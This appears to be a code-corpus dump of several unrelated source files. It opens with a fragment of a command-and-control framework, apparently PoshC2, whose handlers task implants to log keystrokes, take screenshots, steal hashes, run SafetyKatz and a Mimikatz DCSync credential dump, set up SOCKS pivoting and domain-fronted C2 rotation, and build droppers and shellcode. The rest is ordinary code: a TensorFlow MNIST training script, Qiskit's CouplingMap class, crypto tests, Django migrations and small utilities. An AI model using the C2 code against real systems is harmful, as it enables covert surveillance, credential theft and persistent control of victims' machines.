else:
print("Aborted...")
return
print("SharpSocks task issued, to stop SharpSocks run stopsocks")
def do_stop_keystrokes(user, command, randomuri):
new_task("run-exe Logger.KeyStrokesClass Logger %s" % command, user, randomuri)
update_label("", randomuri)
def do_start_keystrokes(user, command, randomuri):
check_module_loaded("Logger.exe", randomuri, user)
new_task("run-exe Logger.KeyStrokesClass Logger %s" % command, user, randomuri)
update_label("KEYLOG", randomuri)
def do_get_keystrokes(user, command, randomuri):
new_task("run-exe Logger.KeyStrokesClass Logger %s" % command, user, randomuri)
def do_get_screenshotmulti(user, command, randomuri):
pwrStatus = get_powerstatusbyrandomuri(randomuri)
if (pwrStatus is not None and pwrStatus[7]):
ri = input("[!] Screen is reported as LOCKED, do you still want to attempt a screenshot? (y/N) ")
if ri.lower() == "n" or ri.lower() == "":
return
new_task(command, user, randomuri)
update_label("SCREENSHOT", randomuri)
def do_get_screenshot(user, command, randomuri):
pwrStatus = get_powerstatusbyrandomuri(randomuri)
if (pwrStatus is not None and pwrStatus[7]):
ri = input("[!] Screen is reported as LOCKED, do you still want to attempt a screenshot? (y/N) ")
if ri.lower() == "n" or ri.lower() == "":
return
new_task(command, user, randomuri)
def do_get_powerstatus(user, command, randomuri):
getpowerstatus(randomuri)
new_task("run-dll PwrStatusTracker.PwrFrm PwrStatusTracker GetPowerStatusResult ", user, randomuri)
def do_stoppowerstatus(user, command, randomuri):
new_task(command, user, randomuri)
update_label("", randomuri)
def do_get_hash(user, command, randomuri):
check_module_loaded("InternalMonologue.exe", randomuri, user)
new_task("run-exe InternalMonologue.Program InternalMonologue", user, randomuri)
def do_safetykatz(user, command, randomuri):
new_task("run-exe SafetyKatz.Program %s" % command, user, randomuri)
def do_loadmoduleforce(user, command, randomuri):
params = re.compile("loadmoduleforce ", re.IGNORECASE)
params = params.sub("", command)
check_module_loaded(params, randomuri, user, force=True)
def do_loadmodule(user, command, randomuri):
params = re.compile("loadmodule ", re.IGNORECASE)
params = params.sub("", command)
check_module_loaded(params, randomuri, user)
def do_listmodules(user, command, randomuri):
modules = os.listdir(ModulesDirectory)
modules = sorted(modules, key=lambda s: s.lower())
print("")
print("[+] Available modules:")
print("")
for mod in modules:
if (".exe" in mod) or (".dll" in mod):
print(mod)
def do_modulesloaded(user, command, randomuri):
implant_details = get_implantdetails(randomuri)
print(implant_details.ModsLoaded)
new_task("listmodules", user, randomuri)
def do_help(user, command, randomuri):
print(sharp_help)
def do_shell(user, command, randomuri):
new_task(command, user, randomuri)
def do_rotation(user, command, randomuri):
domain = input("Domain or URL in array format: \"https://www.example.com\",\"https://www.example2.com\" ")
domainfront = input("Domain front URL in array format: \"fjdsklfjdskl.cloudfront.net\",\"jobs.azureedge.net\" ")
new_task("dfupdate %s" % domainfront, user, randomuri)
new_task("rotate %s" % domain, user, randomuri)
def do_sharpwmi_execute(user, command, randomuri):
style = Style.from_dict({'': '#80d130'})
session = PromptSession(history=FileHistory('%s/.shellcode-history' % PoshProjectDirectory), auto_suggest=AutoSuggestFromHistory(), style=style)
try:
path = session.prompt("Location of base64 vbs/js file: ", completer=FilePathCompleter(PayloadsDirectory, glob="*.b64"))
path = PayloadsDirectory + path
except KeyboardInterrupt:
return
if os.path.isfile(path):
with open(path, "r") as p:
payload = p.read()
new_task("%s payload=%s" % (command, payload), user, randomuri)
else:
print_bad("Could not find file")
def do_pbind_start(user, command, randomuri):
key = get_baseenckey()
if len(command.split()) == 2: # 'pbind-connect <hostname>' is two args
command = f"{command} {PBindPipeName} {PBindSecret} {key}"
elif len(command.split()) == 4: # if the pipe name and secret are already present just add the key
command = f"{command} {key}"
else:
print_bad("Expected 'pbind_connect <hostname>' or 'pbind_connect <hostname> <pipename> <secret>'")
return
new_task(command, user, randomuri)
def do_fcomm_start(user, command, randomuri):
key = get_baseenckey()
    if len(command.split()) == 1: # 'fcomm-connect' is one arg
command = f"{command} {FCommFileName} {key}"
elif len(command.split()) == 2: # if the file name is already there then just add the key
command = f"{command} {key}"
else:
print_bad("Expected 'fcomm_connect' or 'fcomm_connect <filename>'")
return
new_task(command, user, randomuri)
def do_dynamic_code(user, command, randomuri):
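    # Compile DynamicCode.cs from the payloads directory with Mono's C# compiler,
    # then force-load the resulting assembly into the implant and run it.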
compile_command = "mono-csc %sDynamicCode.cs -out:%sPoshC2DynamicCode.exe -target:exe -warn:2 -sdk:4" % (PayloadsDirectory, PayloadsDirectory)
try:
subprocess.check_output(compile_command, shell=True)
except subprocess.CalledProcessError:
return
command = command.replace("dynamic-code", "").strip()
check_module_loaded(f"{PayloadsDirectory}PoshC2DynamicCode.exe", randomuri, user, force=True)
new_task(f"run-exe PoshC2DynamicCode.Program PoshC2DynamicCode {command}", user, randomuri)
def do_startdaisy(user, command, randomuri):
check_module_loaded("daisy.dll", randomuri, user)
elevated = input(Colours.GREEN + "Are you elevated? Y/n " + Colours.END)
domain_front = ""
proxy_user = ""
proxy_pass = ""
proxy_url = ""
cred_expiry = ""
if elevated.lower() == "n":
cont = input(Colours.RED + "Daisy from an unelevated context can only bind to localhost, continue? y/N " + Colours.END)
if cont.lower() == "n" or cont == "":
return
bind_ip = "localhost"
else:
bind_ip = input(Colours.GREEN + "Bind IP on the daisy host: " + Colours.END)
bind_port = input(Colours.GREEN + "Bind Port on the daisy host: " + Colours.END)
firstdaisy = input(Colours.GREEN + "Is this the first daisy in the chain? Y/n? " + Colours.END)
default_url = get_first_url(PayloadCommsHost, DomainFrontHeader)
default_df_header = get_first_dfheader(DomainFrontHeader)
if default_df_header == default_url:
default_df_header = None
if firstdaisy.lower() == "y" or firstdaisy == "":
upstream_url = input(Colours.GREEN + f"C2 URL (leave blank for {default_url}): " + Colours.END)
domain_front = input(Colours.GREEN + f"Domain front header (leave blank for {str(default_df_header)}): " + Colours.END)
proxy_user = input(Colours.GREEN + "Proxy user (<domain>\\<username>, leave blank if none): " + Colours.END)
proxy_pass = input(Colours.GREEN + "Proxy password (leave blank if none): " + Colours.END)
proxy_url = input(Colours.GREEN + "Proxy URL (leave blank if none): " + Colours.END)
        cred_expiry = input(Colours.GREEN + "Password/Account Expiration Date, e.g. 15/03/2018: ")
if not upstream_url:
upstream_url = default_url
if not domain_front:
if default_df_header:
domain_front = default_df_header
else:
domain_front = ""
else:
upstream_daisy_host = input(Colours.GREEN + "Upstream daisy server: " + Colours.END)
upstream_daisy_port = input(Colours.GREEN + "Upstream daisy port: " + Colours.END)
upstream_url = f"http://{upstream_daisy_host}:{upstream_daisy_port}"
domain_front = upstream_daisy_host
urls = get_allurls().replace(" ", "")
useragent = UserAgent
command = f"invoke-daisychain \"{bind_ip}\" \"{bind_port}\" {upstream_url} \"{domain_front}\" \"{proxy_url}\" \"{proxy_user}\" \"{proxy_pass}\" \"{useragent}\" {urls}"
new_task(command, user, randomuri)
update_label("DaisyHost", randomuri)
    createpayloads = input(Colours.GREEN + "Would you like to create payloads for this Daisy Server? Y/n " + Colours.END)
if createpayloads.lower() == "y" or createpayloads == "":
name = input(Colours.GREEN + "Enter a payload name: " + Colours.END)
daisyhost = get_implantdetails(randomuri)
proxynone = "if (!$proxyurl){$wc.Proxy = [System.Net.GlobalProxySelection]::GetEmptyWebProxy()}"
C2 = get_c2server_all()
urlId = new_urldetails(name, f"\"http://{bind_ip}:{bind_port}\"", "\"\"", proxy_url, proxy_user, proxy_pass, cred_expiry)
newPayload = Payloads(C2.KillDate, C2.EncKey, C2.Insecure, C2.UserAgent, C2.Referrer, "%s?d" % get_newimplanturl(), PayloadsDirectory, PowerShellProxyCommand=proxynone,
URLID=urlId)
newPayload.PSDropper = (newPayload.PSDropper).replace("$pid;%s" % (upstream_url), "$pid;%s@%s" % (daisyhost.User, daisyhost.Domain))
newPayload.CreateDroppers(name)
newPayload.CreateRaw(name)
newPayload.CreateDlls(name)
newPayload.CreateShellcode(name)
newPayload.CreateDonutShellcode(name)
newPayload.CreateEXE(name)
newPayload.CreateMsbuild(name)
print_good("Created new %s daisy payloads" % name)
def do_dcsync(user, command, randomuri):
params = re.compile("dcsync ", re.IGNORECASE)
params = params.sub("", command)
res = params.split()
domain = res[0]
dcsync_user = res[1]
new_task(f"run-dll SharpSploit.Credentials.Mimikatz SharpSploit Command \"\\\"lsadump::dcsync /domain:{domain} /user:{dcsync_user}\\\"\"", user, randomuri)
|
frameworks/tensorflow/code/train.py | jerrypeng7773/amazon-sagemaker-examples | 2,610 | 12746252 | from __future__ import print_function
import argparse
import gzip
import json
import logging
import os
import traceback
import numpy as np
import tensorflow as tf
from tensorflow.keras import Model
from tensorflow.keras.layers import Conv2D, Dense, Flatten
logging.basicConfig(level=logging.DEBUG)
# Define the model object
class SmallConv(Model):
def __init__(self):
super(SmallConv, self).__init__()
self.conv1 = Conv2D(32, 3, activation="relu")
self.flatten = Flatten()
self.d1 = Dense(128, activation="relu")
self.d2 = Dense(10)
def call(self, x):
x = self.conv1(x)
x = self.flatten(x)
x = self.d1(x)
return self.d2(x)
# Decode and preprocess data
def convert_to_numpy(data_dir, images_file, labels_file):
"""Byte string to numpy arrays"""
with gzip.open(os.path.join(data_dir, images_file), "rb") as f:
images = np.frombuffer(f.read(), np.uint8, offset=16).reshape(-1, 28, 28)
with gzip.open(os.path.join(data_dir, labels_file), "rb") as f:
labels = np.frombuffer(f.read(), np.uint8, offset=8)
return (images, labels)
def mnist_to_numpy(data_dir, train):
"""Load raw MNIST data into numpy array
Args:
data_dir (str): directory of MNIST raw data.
This argument can be accessed via SM_CHANNEL_TRAINING
train (bool): use training data
Returns:
tuple of images and labels as numpy array
"""
if train:
images_file = "train-images-idx3-ubyte.gz"
labels_file = "train-labels-idx1-ubyte.gz"
else:
images_file = "t10k-images-idx3-ubyte.gz"
labels_file = "t10k-labels-idx1-ubyte.gz"
return convert_to_numpy(data_dir, images_file, labels_file)
def normalize(x, axis):
eps = np.finfo(float).eps
mean = np.mean(x, axis=axis, keepdims=True)
# avoid division by zero
std = np.std(x, axis=axis, keepdims=True) + eps
return (x - mean) / std
# Training logic
def train(args):
# create data loader from the train / test channels
x_train, y_train = mnist_to_numpy(data_dir=args.train, train=True)
x_test, y_test = mnist_to_numpy(data_dir=args.test, train=False)
x_train, x_test = x_train.astype(np.float32), x_test.astype(np.float32)
# normalize the inputs to mean 0 and std 1
x_train, x_test = normalize(x_train, (1, 2)), normalize(x_test, (1, 2))
# expand channel axis
# tf uses depth minor convention
x_train, x_test = np.expand_dims(x_train, axis=3), np.expand_dims(x_test, axis=3)
    # build the tf.data training and evaluation pipelines
train_loader = (
tf.data.Dataset.from_tensor_slices((x_train, y_train))
.shuffle(len(x_train))
.batch(args.batch_size)
)
test_loader = tf.data.Dataset.from_tensor_slices((x_test, y_test)).batch(args.batch_size)
model = SmallConv()
model.compile()
loss_fn = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True)
optimizer = tf.keras.optimizers.Adam(
learning_rate=args.learning_rate, beta_1=args.beta_1, beta_2=args.beta_2
)
train_loss = tf.keras.metrics.Mean(name="train_loss")
train_accuracy = tf.keras.metrics.SparseCategoricalAccuracy(name="train_accuracy")
test_loss = tf.keras.metrics.Mean(name="test_loss")
test_accuracy = tf.keras.metrics.SparseCategoricalAccuracy(name="test_accuracy")
@tf.function
def train_step(images, labels):
with tf.GradientTape() as tape:
predictions = model(images, training=True)
loss = loss_fn(labels, predictions)
grad = tape.gradient(loss, model.trainable_variables)
optimizer.apply_gradients(zip(grad, model.trainable_variables))
train_loss(loss)
train_accuracy(labels, predictions)
return
@tf.function
def test_step(images, labels):
predictions = model(images, training=False)
t_loss = loss_fn(labels, predictions)
test_loss(t_loss)
test_accuracy(labels, predictions)
return
print("Training starts ...")
for epoch in range(args.epochs):
train_loss.reset_states()
train_accuracy.reset_states()
test_loss.reset_states()
test_accuracy.reset_states()
for batch, (images, labels) in enumerate(train_loader):
train_step(images, labels)
for images, labels in test_loader:
test_step(images, labels)
print(
f"Epoch {epoch + 1}, "
f"Loss: {train_loss.result()}, "
f"Accuracy: {train_accuracy.result() * 100}, "
f"Test Loss: {test_loss.result()}, "
f"Test Accuracy: {test_accuracy.result() * 100}"
)
# Save the model
# A version number is needed for the serving container
# to load the model
version = "00000000"
ckpt_dir = os.path.join(args.model_dir, version)
if not os.path.exists(ckpt_dir):
os.makedirs(ckpt_dir)
model.save(ckpt_dir)
return
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument("--batch-size", type=int, default=32)
parser.add_argument("--epochs", type=int, default=1)
parser.add_argument("--learning-rate", type=float, default=1e-3)
parser.add_argument("--beta_1", type=float, default=0.9)
parser.add_argument("--beta_2", type=float, default=0.999)
# Environment variables given by the training image
parser.add_argument("--model-dir", type=str, default=os.environ["SM_MODEL_DIR"])
parser.add_argument("--train", type=str, default=os.environ["SM_CHANNEL_TRAINING"])
parser.add_argument("--test", type=str, default=os.environ["SM_CHANNEL_TESTING"])
parser.add_argument("--current-host", type=str, default=os.environ["SM_CURRENT_HOST"])
parser.add_argument("--hosts", type=list, default=json.loads(os.environ["SM_HOSTS"]))
return parser.parse_args()
if __name__ == "__main__":
args = parse_args()
train(args)
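# ---------------------------------------------------------------------------
# Illustrative local invocation (a sketch, not taken from the repository).
# The argparse defaults above read the SageMaker training environment
# variables, so a plausible way to exercise this entry point outside a
# training job is to stub them first; the /tmp paths are assumptions and must
# contain the raw MNIST .gz files expected by mnist_to_numpy().
#
#   SM_MODEL_DIR=/tmp/model SM_CHANNEL_TRAINING=/tmp/mnist \
#   SM_CHANNEL_TESTING=/tmp/mnist SM_CURRENT_HOST=localhost \
#   SM_HOSTS='["localhost"]' python train.py --epochs 1 --batch-size 64
# ---------------------------------------------------------------------------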
|
qiskit/transpiler/coupling.py | Roshan-Thomas/qiskit-terra | 1,456 | 12746257 | # This code is part of Qiskit.
#
# (C) Copyright IBM 2017, 2019.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""
Directed graph object for representing coupling between physical qubits.
The nodes of the graph correspond to physical qubits (represented as integers) and the
directed edges indicate which physical qubits are coupled and the permitted direction of
CNOT gates. The object has a distance function that can be used to map quantum circuits
onto a device with this coupling.
"""
import io
import warnings
import numpy as np
import retworkx as rx
from qiskit.transpiler.exceptions import CouplingError
from qiskit.exceptions import MissingOptionalLibraryError
class CouplingMap:
"""
Directed graph specifying fixed coupling.
Nodes correspond to physical qubits (integers) and directed edges correspond
to permitted CNOT gates
"""
__slots__ = ("description", "graph", "_dist_matrix", "_qubit_list", "_size", "_is_symmetric")
def __init__(self, couplinglist=None, description=None):
"""
Create coupling graph. By default, the generated coupling has no nodes.
Args:
couplinglist (list or None): An initial coupling graph, specified as
an adjacency list containing couplings, e.g. [[0,1], [0,2], [1,2]].
It is required that nodes are contiguously indexed starting at 0.
Missed nodes will be added as isolated nodes in the coupling map.
description (str): A string to describe the coupling map.
"""
self.description = description
# the coupling map graph
self.graph = rx.PyDiGraph()
# a dict of dicts from node pairs to distances
self._dist_matrix = None
# a sorted list of physical qubits (integers) in this coupling map
self._qubit_list = None
# number of qubits in the graph
self._size = None
self._is_symmetric = None
if couplinglist is not None:
self.graph.extend_from_edge_list([tuple(x) for x in couplinglist])
def size(self):
"""Return the number of physical qubits in this graph."""
if self._size is None:
self._size = len(self.graph)
return self._size
def get_edges(self):
"""
Gets the list of edges in the coupling graph.
Returns:
Tuple(int,int): Each edge is a pair of physical qubits.
"""
return self.graph.edge_list()
def add_physical_qubit(self, physical_qubit):
"""Add a physical qubit to the coupling graph as a node.
        Args:
            physical_qubit (int): An integer representing a physical qubit.
Raises:
CouplingError: if trying to add duplicate qubit
"""
if not isinstance(physical_qubit, int):
raise CouplingError("Physical qubits should be integers.")
if physical_qubit in self.physical_qubits:
raise CouplingError(
"The physical qubit %s is already in the coupling graph" % physical_qubit
)
self.graph.add_node(physical_qubit)
self._dist_matrix = None # invalidate
self._qubit_list = None # invalidate
self._size = None # invalidate
def add_edge(self, src, dst):
"""
Add directed edge to coupling graph.
        Args:
            src (int): source physical qubit
            dst (int): destination physical qubit
"""
if src not in self.physical_qubits:
self.add_physical_qubit(src)
if dst not in self.physical_qubits:
self.add_physical_qubit(dst)
self.graph.add_edge(src, dst, None)
self._dist_matrix = None # invalidate
self._is_symmetric = None # invalidate
def subgraph(self, nodelist):
"""Return a CouplingMap object for a subgraph of self.
        Args:
            nodelist (list): list of integer node labels
"""
warnings.warn(
"The .subgraph() method is deprecated and will be removed in a "
"future release. Instead the .reduce() method should be used "
"instead which does the same thing but preserves nodelist order.",
DeprecationWarning,
stacklevel=2,
)
subcoupling = CouplingMap()
subcoupling.graph = self.graph.subgraph(nodelist)
return subcoupling
@property
def physical_qubits(self):
"""Returns a sorted list of physical_qubits"""
if self._qubit_list is None:
self._qubit_list = self.graph.node_indexes()
return self._qubit_list
def is_connected(self):
"""
Test if the graph is connected.
Return True if connected, False otherwise
"""
try:
return rx.is_weakly_connected(self.graph)
except rx.NullGraph:
return False
def neighbors(self, physical_qubit):
"""Return the nearest neighbors of a physical qubit.
Directionality matters, i.e. a neighbor must be reachable
by going one hop in the direction of an edge.
"""
return self.graph.neighbors(physical_qubit)
@property
def distance_matrix(self):
"""Return the distance matrix for the coupling map."""
self.compute_distance_matrix()
return self._dist_matrix
def compute_distance_matrix(self):
"""Compute the full distance matrix on pairs of nodes.
The distance map self._dist_matrix is computed from the graph using
all_pairs_shortest_path_length. This is normally handled internally
by the :attr:`~qiskit.transpiler.CouplingMap.distance_matrix`
attribute or the :meth:`~qiskit.transpiler.CouplingMap.distance` method
but can be called if you're accessing the distance matrix outside of
those or want to pre-generate it.
"""
if self._dist_matrix is None:
if not self.is_connected():
raise CouplingError("coupling graph not connected")
self._dist_matrix = rx.digraph_distance_matrix(self.graph, as_undirected=True)
def distance(self, physical_qubit1, physical_qubit2):
"""Returns the undirected distance between physical_qubit1 and physical_qubit2.
Args:
physical_qubit1 (int): A physical qubit
physical_qubit2 (int): Another physical qubit
Returns:
int: The undirected distance
Raises:
CouplingError: if the qubits do not exist in the CouplingMap
"""
if physical_qubit1 >= self.size():
raise CouplingError("%s not in coupling graph" % physical_qubit1)
if physical_qubit2 >= self.size():
raise CouplingError("%s not in coupling graph" % physical_qubit2)
self.compute_distance_matrix()
return int(self._dist_matrix[physical_qubit1, physical_qubit2])
def shortest_undirected_path(self, physical_qubit1, physical_qubit2):
"""Returns the shortest undirected path between physical_qubit1 and physical_qubit2.
Args:
physical_qubit1 (int): A physical qubit
physical_qubit2 (int): Another physical qubit
Returns:
List: The shortest undirected path
Raises:
CouplingError: When there is no path between physical_qubit1, physical_qubit2.
"""
paths = rx.digraph_dijkstra_shortest_paths(
self.graph, source=physical_qubit1, target=physical_qubit2, as_undirected=True
)
if not paths:
raise CouplingError(
f"Nodes {str(physical_qubit1)} and {str(physical_qubit2)} are not connected"
)
return paths[physical_qubit2]
@property
def is_symmetric(self):
"""
Test if the graph is symmetric.
Return True if symmetric, False otherwise
"""
if self._is_symmetric is None:
self._is_symmetric = self._check_symmetry()
return self._is_symmetric
def make_symmetric(self):
"""
Convert uni-directional edges into bi-directional.
"""
edges = self.get_edges()
for src, dest in edges:
if (dest, src) not in edges:
self.add_edge(dest, src)
self._dist_matrix = None # invalidate
self._is_symmetric = None # invalidate
def _check_symmetry(self):
"""
Calculates symmetry
Returns:
Bool: True if symmetric, False otherwise
"""
return self.graph.is_symmetric()
def reduce(self, mapping):
"""Returns a reduced coupling map that
corresponds to the subgraph of qubits
selected in the mapping.
Args:
mapping (list): A mapping of reduced qubits to device
qubits.
Returns:
CouplingMap: A reduced coupling_map for the selected qubits.
Raises:
CouplingError: Reduced coupling map must be connected.
"""
from scipy.sparse import coo_matrix, csgraph
reduced_qubits = len(mapping)
inv_map = [None] * (max(mapping) + 1)
for idx, val in enumerate(mapping):
inv_map[val] = idx
reduced_cmap = []
for edge in self.get_edges():
if edge[0] in mapping and edge[1] in mapping:
reduced_cmap.append([inv_map[edge[0]], inv_map[edge[1]]])
# Verify coupling_map is connected
rows = np.array([edge[0] for edge in reduced_cmap], dtype=int)
cols = np.array([edge[1] for edge in reduced_cmap], dtype=int)
data = np.ones_like(rows)
mat = coo_matrix((data, (rows, cols)), shape=(reduced_qubits, reduced_qubits)).tocsr()
if csgraph.connected_components(mat)[0] != 1:
raise CouplingError("coupling_map must be connected.")
return CouplingMap(reduced_cmap)
@classmethod
def from_full(cls, num_qubits, bidirectional=True) -> "CouplingMap":
"""Return a fully connected coupling map on n qubits."""
cmap = cls(description="full")
if bidirectional:
cmap.graph = rx.generators.directed_mesh_graph(num_qubits)
else:
edge_list = []
for i in range(num_qubits):
for j in range(i):
edge_list.append((j, i))
cmap.graph.extend_from_edge_list(edge_list)
return cmap
@classmethod
def from_line(cls, num_qubits, bidirectional=True) -> "CouplingMap":
"""Return a coupling map of n qubits connected in a line."""
cmap = cls(description="line")
cmap.graph = rx.generators.directed_path_graph(num_qubits, bidirectional=bidirectional)
return cmap
@classmethod
def from_ring(cls, num_qubits, bidirectional=True) -> "CouplingMap":
"""Return a coupling map of n qubits connected to each of their neighbors in a ring."""
cmap = cls(description="ring")
cmap.graph = rx.generators.directed_cycle_graph(num_qubits, bidirectional=bidirectional)
return cmap
@classmethod
def from_grid(cls, num_rows, num_columns, bidirectional=True) -> "CouplingMap":
"""Return a coupling map of qubits connected on a grid of num_rows x num_columns."""
cmap = cls(description="grid")
cmap.graph = rx.generators.directed_grid_graph(
num_rows, num_columns, bidirectional=bidirectional
)
return cmap
@classmethod
def from_heavy_hex(cls, distance, bidirectional=True) -> "CouplingMap":
"""Return a heavy hexagon graph coupling map.
A heavy hexagon graph is described in:
https://journals.aps.org/prx/abstract/10.1103/PhysRevX.10.011022
Args:
distance (int): The code distance for the generated heavy hex
graph. The value for distance can be any odd positive integer.
The distance relates to the number of qubits by:
:math:`n = \\frac{5d^2 - 2d - 1}{2}` where :math:`n` is the
number of qubits and :math:`d` is the ``distance`` parameter.
bidirectional (bool): Whether the edges in the output coupling
graph are bidirectional or not. By default this is set to
``True``
Returns:
CouplingMap: A heavy hex coupling graph
"""
cmap = cls(description="heavy-hex")
cmap.graph = rx.generators.directed_heavy_hex_graph(distance, bidirectional=bidirectional)
return cmap
@classmethod
def from_heavy_square(cls, distance, bidirectional=True) -> "CouplingMap":
"""Return a heavy square graph coupling map.
A heavy square graph is described in:
https://journals.aps.org/prx/abstract/10.1103/PhysRevX.10.011022
Args:
distance (int): The code distance for the generated heavy square
graph. The value for distance can be any odd positive integer.
The distance relates to the number of qubits by:
:math:`n = 3d^2 - 2d` where :math:`n` is the
number of qubits and :math:`d` is the ``distance`` parameter.
bidirectional (bool): Whether the edges in the output coupling
graph are bidirectional or not. By default this is set to
``True``
Returns:
CouplingMap: A heavy square coupling graph
"""
cmap = cls(description="heavy-square")
cmap.graph = rx.generators.directed_heavy_square_graph(
distance, bidirectional=bidirectional
)
return cmap
@classmethod
def from_hexagonal_lattice(cls, rows, cols, bidirectional=True) -> "CouplingMap":
"""Return a hexagonal lattice graph coupling map.
Args:
rows (int): The number of rows to generate the graph with.
cols (int): The number of columns to generate the graph with.
bidirectional (bool): Whether the edges in the output coupling
graph are bidirectional or not. By default this is set to
``True``
Returns:
CouplingMap: A hexagonal lattice coupling graph
"""
cmap = cls(description="hexagonal-lattice")
cmap.graph = rx.generators.directed_hexagonal_lattice_graph(
rows, cols, bidirectional=bidirectional
)
return cmap
def largest_connected_component(self):
"""Return a set of qubits in the largest connected component."""
return max(rx.weakly_connected_components(self.graph), key=len)
def __str__(self):
"""Return a string representation of the coupling graph."""
string = ""
if self.get_edges():
string += "["
string += ", ".join([f"[{src}, {dst}]" for (src, dst) in self.get_edges()])
string += "]"
return string
def draw(self):
"""Draws the coupling map.
This function needs `pydot <https://github.com/erocarrera/pydot>`_,
which in turn needs `Graphviz <https://www.graphviz.org/>`_ to be
installed. Additionally, `pillow <https://python-pillow.org/>`_ will
need to be installed.
Returns:
PIL.Image: Drawn coupling map.
Raises:
MissingOptionalLibraryError: when pydot or pillow are not installed.
"""
try:
import pydot
except ImportError as ex:
raise MissingOptionalLibraryError(
libname="pydot",
name="coupling map drawer",
pip_install="pip install pydot",
) from ex
try:
from PIL import Image
except ImportError as ex:
raise MissingOptionalLibraryError(
libname="pillow",
name="coupling map drawer",
pip_install="pip install pillow",
) from ex
dot_str = self.graph.to_dot()
dot = pydot.graph_from_dot_data(dot_str)[0]
png = dot.create_png(prog="neato")
return Image.open(io.BytesIO(png))
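# ---------------------------------------------------------------------------
# Usage sketch (illustrative only; the 3-qubit line below is an arbitrary
# coupling list chosen to demonstrate the API defined above, not part of the
# original module).
if __name__ == "__main__":
    _demo = CouplingMap(couplinglist=[[0, 1], [1, 2]])
    print(_demo)                                   # [[0, 1], [1, 2]]
    print(_demo.distance(0, 2))                    # 2: undirected shortest path
    print(_demo.shortest_undirected_path(0, 2))    # [0, 1, 2]
    print(CouplingMap.from_ring(4).is_symmetric)   # True: ring edges are bidirectional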
|
wrappers/python/tests/crypto/test_unpack_message.py | absltkaos/indy-sdk | 636 | 12746265 | <filename>wrappers/python/tests/crypto/test_unpack_message.py
import json
import pytest
from indy import crypto, error
@pytest.mark.asyncio
async def test_pack_message_and_unpack_message_authcrypt_works(wallet_handle, identity_my1, identity_steward1,
pack_message):
# setup keys
_, sender_vk = identity_my1
_, steward_vk = identity_steward1
recipient_verkeys = [steward_vk]
# run pack and unpack
packed_message = await crypto.pack_message(wallet_handle, pack_message, recipient_verkeys, sender_vk)
unpacked_message = await crypto.unpack_message(wallet_handle, packed_message)
# test function
unpacked_message_json = json.loads(unpacked_message.decode("utf-8"))
assert unpacked_message_json['message'] == pack_message
assert unpacked_message_json['recipient_verkey'] == steward_vk
assert unpacked_message_json['sender_verkey'] == sender_vk
@pytest.mark.asyncio
async def test_pack_message_and_unpack_message_anoncrypt_works(wallet_handle, identity_steward1, pack_message):
# setup keys
_, steward_vk = identity_steward1
recipient_verkeys = [steward_vk]
# run pack and unpack
packed_message = await crypto.pack_message(wallet_handle, pack_message, recipient_verkeys, None)
unpacked_message = await crypto.unpack_message(wallet_handle, packed_message)
# test function
unpacked_message_json = json.loads(unpacked_message.decode("utf-8"))
assert unpacked_message_json['message'] == pack_message
assert unpacked_message_json['recipient_verkey'] == steward_vk
assert 'sender_verkey' not in unpacked_message_json
@pytest.mark.asyncio
async def test_pack_message_and_unpack_message_missing_verkey(wallet_handle, identity_my1, verkey_my2, pack_message):
# setup keys
_, sender_vk = identity_my1
recipient_verkeys = [verkey_my2]
# run pack and unpack
packed_message = await crypto.pack_message(wallet_handle, pack_message, recipient_verkeys, sender_vk)
with pytest.raises(error.WalletItemNotFound):
await crypto.unpack_message(wallet_handle, packed_message)
|
orchestra/migrations/0037_add_fields_to_iteration.py | code-review-doctor/orchestra | 444 | 12746283 | <filename>orchestra/migrations/0037_add_fields_to_iteration.py<gh_stars>100-1000
# -*- coding: utf-8 -*-
# Generated by Django 1.9.5 on 2016-04-14 21:18
from __future__ import unicode_literals
import django.utils.timezone
from django.db import migrations
from django.db import models
class Migration(migrations.Migration):
dependencies = [
('orchestra', '0036_remove_taskassignment_snapshots'),
]
operations = [
migrations.AddField(
model_name='iteration',
name='created_at',
field=models.DateTimeField(default=django.utils.timezone.now),
),
migrations.AddField(
model_name='iteration',
name='is_deleted',
field=models.BooleanField(default=False),
),
]
|
securetea/lib/social_engineering/utils.py | pwned-17/SecureTea-Project | 257 | 12746287 | <gh_stars>100-1000
# -*- coding: utf-8 -*-
u"""Utils module for SecureTea Social Engineering.
Project:
╔═╗┌─┐┌─┐┬ ┬┬─┐┌─┐╔╦╗┌─┐┌─┐
╚═╗├┤ │ │ │├┬┘├┤ ║ ├┤ ├─┤
╚═╝└─┘└─┘└─┘┴└─└─┘ ╩ └─┘┴ ┴
Author: <NAME> <<EMAIL>> , Aug 6 2020
Version: 2.1
Module: SecureTea
"""
import re
def check_valid_email(email):
"""
Check whether the email string is valid or not
Args:
email : email id
Raises:
None
Returns:
bool: True if valid, else False
"""
    regex_std_mails = r"^[a-z0-9]+[\._]?[a-z0-9]+[@]\w+[.]\w{2,3}$"
    regex_custom_mails = r"^[a-z0-9]+[\._]?[a-z0-9]+[@]\w+[.]\w+$"
    return bool(re.search(regex_std_mails, email) or re.search(regex_custom_mails, email)) |
api/tacticalrmm/autotasks/migrations/0009_automatedtask_run_time_bit_weekdays.py | infinite8co/tacticalrmm | 903 | 12746304 | # Generated by Django 3.1.3 on 2020-11-29 09:12
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("autotasks", "0008_auto_20201030_1515"),
]
operations = [
migrations.AddField(
model_name="automatedtask",
name="run_time_bit_weekdays",
field=models.IntegerField(blank=True, null=True),
),
]
|
tools/third_party/websockets/src/websockets/typing.py | meyerweb/wpt | 14,668 | 12746307 | <filename>tools/third_party/websockets/src/websockets/typing.py
from typing import List, NewType, Optional, Tuple, Union
__all__ = ["Data", "Origin", "ExtensionHeader", "ExtensionParameter", "Subprotocol"]
Data = Union[str, bytes]
Data__doc__ = """
Types supported in a WebSocket message:
- :class:`str` for text messages
- :class:`bytes` for binary messages
"""
# Remove try / except when dropping support for Python < 3.7
try:
Data.__doc__ = Data__doc__ # type: ignore
except AttributeError: # pragma: no cover
pass
Origin = NewType("Origin", str)
Origin.__doc__ = """Value of an Origin header"""
ExtensionName = NewType("ExtensionName", str)
ExtensionName.__doc__ = """Name of a WebSocket extension"""
ExtensionParameter = Tuple[str, Optional[str]]
ExtensionParameter__doc__ = """Parameter of a WebSocket extension"""
